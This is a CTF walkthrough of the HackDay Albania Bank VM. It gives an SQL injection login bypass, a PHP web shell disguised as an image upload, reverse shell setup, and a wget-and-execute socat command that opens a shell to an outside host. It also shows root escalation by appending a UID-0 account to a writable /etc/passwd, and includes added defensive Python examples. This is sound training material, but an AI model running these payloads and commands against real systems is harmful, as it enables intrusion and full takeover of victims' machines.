CTF: HackDay Albania Bank Walkthrough

This CTF challenge is fun and not that difficult, but it provides a lot of opportunity to practice SQL injection and writable-file abuse. I really enjoyed this one.

Tools & Techniques

  • nmap, dirb
  • Burp Suite
  • SQLMap
  • Reverse Shell
  • Exploiting a writeable file

Enumeration

sudo arp-scan -l

nmap 192.168.0.42

sudo nmap -sV -p- -AO 192.168.0.42
(nmap scan)

Discovering the Banking Website

I would highly recommend you check out mrb3n’s walkthrough. Ben gets it right. He writes a script that iterates through the directories trying to find the correct folder. You can improve your awk and cut skills.

Ultimately, I just went down the list copying and pasting the folders into the browser to see what came up.

(robots.txt)

SQL Injection

After running dirb and nikto with little useful results, my gut told me this would be a SQL injection vulnerability. I used SQLMap to identify some SQL injection vulnerabilities. At first, I tried using the payloads with Burp Suite, but that didn’t work. However, I was able to copy and paste the payload into the login form and gain access to a user.

(SQLMap)

You can easily get access by pasting the SQL injection payload SQLMap found into the contact form field for the username and using a “#” for the password.

# username
' RLIKE SLEEP(1) --jUMp

# password
#
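The reason the payload above works is that everything after the `--` becomes a SQL comment, so the password predicate is never evaluated. As an added example (not code from the original post or from the target application), the block below builds the query the way a vulnerable login would, shows that the walkthrough's own payload comments out the password check, and contrasts it with a parameterised query against an in-memory SQLite table where the same input is treated purely as data. The table, the `alice` account and the `safe_login` function are constructed for the demo; a real application would compare a password hash rather than a plaintext column.

```python
import sqlite3

# Payload from the walkthrough: the trailing "--" turns the rest of the
# statement, including the password check, into a comment.
USERNAME_PAYLOAD = "' RLIKE SLEEP(1) --jUMp"
PASSWORD_PAYLOAD = "#"


def build_vulnerable_query(username: str, password: str) -> str:
    """String concatenation, the way a vulnerable login typically builds its SQL.
    Returned only for inspection; it is never executed here."""
    return ("SELECT id, username FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def password_check_is_commented_out(query: str) -> bool:
    """True when a '--' comment marker appears before the password predicate,
    i.e. the injected input has neutralised the password check."""
    comment_at = query.find("--")
    return comment_at != -1 and comment_at < query.find("AND password")


def make_demo_db() -> sqlite3.Connection:
    """In-memory users table with one constructed account (hypothetical values).
    Plaintext password column kept only so the demo stays short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                 ("alice", "correct-horse"))
    conn.commit()
    return conn


def safe_login(conn: sqlite3.Connection, username: str, password: str):
    """Parameterised query: user input is bound as data and never parsed as SQL,
    so quotes, RLIKE and '--' in the username are just characters to match.
    Returns the matching row or None."""
    return conn.execute(
        "SELECT id, username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


if __name__ == "__main__":
    print(build_vulnerable_query(USERNAME_PAYLOAD, PASSWORD_PAYLOAD))
    conn = make_demo_db()
    print("injected login with parameters:", safe_login(conn, USERNAME_PAYLOAD, PASSWORD_PAYLOAD))
    print("real credentials:", safe_login(conn, "alice", "correct-horse"))
```

SQLite is used only because it ships with Python; the concatenated query is never run (RLIKE and SLEEP are MySQL functions), the point is visible in the string itself, and the parameterised query behaves the same way on MySQL with a proper driver.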

I also recommend reading about what reedphish did. The article demonstrates using wfuzz to find a user that could be brute-forced.

The cool thing about using Burp Suite was that I could see the SQL injection cause a delay before the data loaded. Unfortunately, that’s all I saw.

(Burp Suite)

Uploading a Malicious Image

Once I was logged in to the bank website, there was a screen to upload a support ticket with an image. It isn’t very clear what you can or can’t upload, so I tried uploading a text file and it gave me this error.

So… I created a malicious image, mal.jpg:

GIF89;
<?php system($_GET['c']); ?>

Burp Suite

Before I got a reverse shell, I tried to use Burp Suite to get a call home, but it did not work. So I pulled information out, like the users, and started running that information through hydra. This resulted in no credentials after 30 minutes of running.

(Burp Suite – /etc/passwd)

Reverse Shell

I customized pentest monkey’s PHP reverse shell and uploaded it to the help desk. This worked flawlessly.

(Configuring pen test monkey’s php reverse shell script)

To start the listener for the reverse shell I ran these commands:

sudo ufw allow 443
sudo nc -nvlp 443
(pen test monkey reverse shell established)

Getting PTTY

I tried using python, but python 2 is not installed. For whatever reason I didn’t think about trying python 3, so I ended up trying a new method using a static binary like socat.

I read about this technique here: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

# in parrot os.. start a netcat listener
sudo ufw allow 4444
sudo nc -nvlp 4444
# in current reverse shell use socat to get a 2nd reverse shell with tty
cd /tmp/
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.0.37:4444

# if you lose the reverse shell you can get it back by running this command (socat is already in /tmp)
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.0.37:4444

Privilege Escalation

Once I had a reverse shell and started snooping around, I could see that there was one user on the box who had recently used a sudo command successfully. This turns out to be a possible rabbit hole.

LinEnum

I pulled LinEnum and executed that script from the /tmp folder and found a way up. It turns out that /etc/passwd was writable. This means I could create a new user or put a password in place for taviso.

(/etc/passwd is writeable)

Creating a Root User

First, you’ll need to get a hashed password using openssl. Do this on your attack machine and base64 encode the string.

# in parrot os (I used "asdf" for the password)
openssl passwd -1

# generated password is
$1$woQDlhpK$mKCdIm/.e69hq8wGeE7Fs.

# final string for /etc/passwd... this needs to be base64 encoded.
hax:$1$woQDlhpK$mKCdIm/.e69hq8wGeE7Fs.:0:0:hax:/root:/bin/bash

# use an online base 64 tool
aGF4OiQxJHdvUURsaHBLJG1LQ2RJbS8uZTY5aHE4d0dlRTdGcy46MDowOmhheDovcm9vdDovYmluL2Jhc2g=

In the reverse shell you will need to execute this command to create a user in the /etc/passwd file.

# echo "hax" user into /etc/passwd
echo aGF4OiQxJHdvUURsaHBLJG1LQ2RJbS8uZTY5aHE4d0dlRTdGcy46MDowOmhheDovcm9vdDovYmluL2Jhc2g= | base64 -d >> /etc/passwd

# switch to that user
su hax
asdf
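The whole escalation rests on two things a host check can catch: the file mode on /etc/passwd, and an entry that carries a password hash and UID 0 instead of the `x` placeholder that defers to /etc/shadow. As an added example (not code from the original post or from LinEnum), the block below audits passwd content for exactly those signs and checks the live file's permissions and owner. The sample passwd text is constructed and includes the `hax` line from the walkthrough; `audit_passwd_text` and `passwd_mode_findings` are names chosen for this demo.

```python
import os
import stat

# Constructed /etc/passwd content: a normal root line, a normal user, and the
# "hax" line from the walkthrough (hash copied from the page, not a live account).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
taviso:x:1000:1000:Tavis:/home/taviso:/bin/bash
hax:$1$woQDlhpK$mKCdIm/.e69hq8wGeE7Fs.:0:0:hax:/root:/bin/bash
"""


def audit_passwd_text(text: str) -> list:
    """Return (username, finding) pairs for entries that indicate tampering:
    extra UID-0 accounts, empty password fields, or a hash stored directly in
    /etc/passwd instead of the 'x' placeholder that points at /etc/shadow."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if uid == "0" and name != "root":
            findings.append((name, "UID 0 account other than root"))
        if pw == "":
            findings.append((name, "empty password field (login without a password)"))
        elif pw not in ("x", "*"):
            findings.append((name, "password hash stored in /etc/passwd (bypasses /etc/shadow)"))
    return findings


def passwd_mode_findings(path: str = "/etc/passwd") -> list:
    """Flag a passwd file writable by group or others, or not owned by root;
    the expected state is mode 0644 owned by root."""
    st = os.stat(path)
    findings = []
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append((path, f"writable by group/others (mode {stat.S_IMODE(st.st_mode):04o})"))
    if st.st_uid != 0:
        findings.append((path, f"not owned by root (uid {st.st_uid})"))
    return findings


def audit_passwd_file(path: str = "/etc/passwd") -> list:
    """Combine the permission check and the content check for a real file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return passwd_mode_findings(path) + audit_passwd_text(fh.read())


if __name__ == "__main__":
    # Run against the constructed sample; swap in audit_passwd_file() on a host.
    for who, what in audit_passwd_text(SAMPLE_PASSWD):
        print(f"{who}: {what}")
```

On a host the same two findings would show up as a file-integrity alert (passwd changed, new UID-0 entry) and as an `su`/login record for an account that does not exist in /etc/shadow, which is worth a correlation rule on its own.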

Root Flag